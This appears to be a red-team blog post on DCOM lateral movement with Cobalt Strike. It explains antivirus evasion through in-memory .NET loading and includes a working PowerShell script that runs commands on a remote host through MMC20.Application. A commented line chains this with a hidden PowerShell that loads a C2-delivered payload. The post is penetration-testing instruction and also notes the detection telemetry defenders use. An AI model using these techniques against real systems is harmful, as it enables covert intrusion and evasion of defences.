Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality for the attacker, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

When researching lateral movement techniques I came across a post from Raphael Mudge (of Cobalt Strike fame). He details scripting an Aggressor Script for Matt Nelson's MMC20.Application lateral movement technique. Reading that post spurred me to make my own DCOM-based lateral movement tool for Cobalt Strike. But considering that Raphael Mudge had already gone there with the Aggressor Script, I needed to do something a little different, so I added antivirus evasion on top of it.

A word about Cobalt Strike C2

Cobalt Strike is a commercial Command and Control (C2) framework used by many red teams and cyber security consultancies around the world. At a high level, the idea behind a C2 framework is to allow for the management of red team activities. For me, its best feature is being able to keep an organised view of a victim organisation's network. My colleague, Neil Lines, wrote a great introductory blog post about Cobalt Strike, which I recommend you read if you are new to it.

While Cobalt Strike is extremely useful and allows for an abundance of possibilities, some of the "out-of-the-box" tooling it provides does not take the current demands of a red team's Operational Security (OPSEC) into consideration. Therefore, if you are trying to remain stealthy on a red team engagement, it is useful to have your own custom tools that can duck and weave around existing defensive solutions such as SIEM, AV and EDR. When creating such tooling it is useful to use the latest researched techniques. These can be learnt through certifications or read about on websites such as MITRE ATT&CK. Or, if you are lucky, you get to pick the brains of talented individuals such as

Evading Microsoft Defender – reflective DLL injection / PE Injection

It is possible to bypass certain AVs by encoding executables containing payloads with tools such as msfvenom, although its encoders were designed to avoid bad characters rather than AV, and their output is well signatured. Alternatively, tools such as Shellter or Veil can be used to create custom Portable Executables (PEs) capable of bypassing common anti-virus solutions. These tools also allow you to inject payloads into legitimate software to mask your malicious code from the AV even better. These tools can be successful at performing their task; however, if one uses the same binary several times there is a good chance it will be added to existing AV/EDR signature databases. Using websites like VirusTotal to test the detection rate of your executables will also likely speed up the process of your malware getting added to an AV signature database, since submitted samples are shared with vendors. In general, uploading binaries onto a target is currently a bit of an unnecessary risk, therefore I wanted to look into ways of performing lateral movement with malware that does not need to be transferred to the disk of the target.

The great thing about Cobalt Strike is the option to execute .NET binaries in the memory of the target (execute-assembly) without needing to transfer them to disk. Following the same idea, I wanted to be able to transfer malware to the target that would execute in memory and avoid the unnecessary triggering of AV by the fact that it is present on the disk. I came across a technique called reflective DLL injection and thought it was genius. Reflective DLL injection, in the form used here, involves loading a .NET Dynamic Link Library (DLL) into the memory of the target from a byte array rather than from a file path. Common tooling such as PowerShell can be used to load the DLL and allows the execution of your choice of the methods available within the DLL. This results in diskless malware execution. I liked the concept; however, performing the preparation for such a task was slightly lengthy, therefore my programmer instincts kicked in and I thought why not create some automation.
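The two building blocks the post combines, a DCOM remote execution primitive (the MMC20.Application technique mentioned earlier) and a diskless .NET load via PowerShell (described just above), as an added PowerShell example. This is not the author's tool and not Raphael Mudge's Aggressor Script; the function names, the target hostname WORKSTATION01 and the small Demo.Payload assembly the script compiles for itself are assumptions made for the example.

```powershell
# Added example (not the post's own tool or Raphael Mudge's Aggressor Script).
# Two building blocks of DCOM-based lateral movement with in-memory .NET execution:
#   1. Invoke-AssemblyFromBytes : load a .NET assembly from a byte[] with
#      Assembly.Load and call a static method on it, nothing written to disk.
#   2. Invoke-Mmc20ShellCommand : run a command on a remote host through the
#      MMC20.Application DCOM object (needs local admin on the target and
#      TCP 135 plus the dynamic RPC port range reachable).
# The hostname, the method name and the sample C# class are assumptions.

function Invoke-AssemblyFromBytes {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [Parameter(Mandatory)][string]$TypeName,
        [Parameter(Mandatory)][string]$MethodName,
        [object[]]$Arguments = @()
    )
    # Assembly.Load(byte[]) maps the image straight from memory; $asm.Location
    # stays empty because there is no backing file. On .NET Framework 4.8+ this
    # call also hands the buffer to AMSI, so "not on disk" is not "not scanned".
    $asm    = [System.Reflection.Assembly]::Load($Bytes)
    $type   = $asm.GetType($TypeName, $true)
    $method = $type.GetMethod($MethodName)
    if (-not $method) { throw "Method $MethodName not found on $TypeName" }
    # Static method, so no instance object is passed.
    return $method.Invoke($null, $Arguments)
}

function Invoke-Mmc20ShellCommand {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$Command,
        [string]$Parameters = ''
    )
    # Activate MMC20.Application on the remote host over DCOM. The resulting
    # mmc.exe runs as the calling user; ExecuteShellCommand(Command, Directory,
    # Parameters, WindowState) then spawns the command as a child of that mmc.exe,
    # which is exactly the parent/child relationship defenders look for.
    $type = [Type]::GetTypeFromProgID('MMC20.Application', $ComputerName)
    $mmc  = [Activator]::CreateInstance($type)
    try {
        # WindowState '7' = minimized
        $mmc.Document.ActiveView.ExecuteShellCommand($Command, $null, $Parameters, '7')
    } finally {
        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
    }
}

# --- Local demonstration of block 1 (runs offline) ---------------------------
# A tiny assembly is compiled to a temp file only to obtain realistic bytes;
# the file is deleted before the in-memory load so the loader itself never
# reads from disk. On an engagement the bytes would arrive over the C2 channel.
$src = @'
namespace Demo {
    public static class Payload {
        public static string Run(string who) {
            return "Hello from memory, " + who + " on " + System.Environment.MachineName;
        }
    }
}
'@
$tmp = Join-Path ([System.IO.Path]::GetTempPath()) ("demo_{0}.dll" -f [guid]::NewGuid())
Add-Type -TypeDefinition $src -OutputAssembly $tmp -OutputType Library
$bytes = [System.IO.File]::ReadAllBytes($tmp)
Remove-Item $tmp -Force

Invoke-AssemblyFromBytes -Bytes $bytes -TypeName 'Demo.Payload' -MethodName 'Run' -Arguments @('operator')

# --- Chaining the two (not run here; the target is an assumption) -------------
# The DCOM primitive launches PowerShell on the remote host, and the launched
# PowerShell performs the in-memory load with bytes fetched from the C2 channel:
# Invoke-Mmc20ShellCommand -ComputerName 'WORKSTATION01' -Command 'powershell.exe' `
#     -Parameters '-nop -w hidden -c "<script that fetches bytes and calls Invoke-AssemblyFromBytes>"'
```

The local part runs as-is in Windows PowerShell 5.1 or PowerShell 7 on Windows. The DCOM part needs local administrator rights on the target and leaves an mmc.exe process there whose child is the command you ran, which is the process lineage most EDR rules for this technique key on. Two caveats on "diskless": on .NET Framework 4.8 and later, Assembly.Load(byte[]) passes the buffer to AMSI before mapping it, so the same scanning that applies to execute-assembly applies here, and PowerShell script block logging records everything the one-liner does. Staying off the disk removes the file-scan signature, not the behavioural telemetry.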